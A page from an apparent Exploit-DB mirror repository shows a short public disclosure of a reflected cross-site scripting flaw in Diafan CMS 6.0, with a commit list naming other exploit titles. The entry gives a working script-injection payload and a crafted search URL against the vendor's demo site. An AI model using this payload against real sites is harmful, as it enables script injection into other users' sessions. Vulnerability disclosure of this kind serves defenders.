bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51529.txt
Exploit-DB 147824bdba DB: 2023-06-20 
8 changes to exploits/shellcodes/ghdb

Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)

BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)

Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)

Groomify v1.0 - SQL Injection

Jobpilot v2.61 - SQL Injection

Sales Tracker Management System v1.0 - Multiple Vulnerabilities

Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)

The Shop v2.5 - SQL Injection

WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password

Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass
2023-06-20 00:16:29 +00:00

13 lines
No EOL
558 B
Text
Raw Blame History

# Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr / Hulya Karabag
# Vendor Homepage: https://www.diafancms.com/
# Version: 6.0
# Tested on: https://demo.diafancms.com
Description:
1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field:
Payload : "><script>alert(document.domain)<%2Fscript>
2) After will you see alert button :
https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0
Reference in a new issue View git blame Copy permalink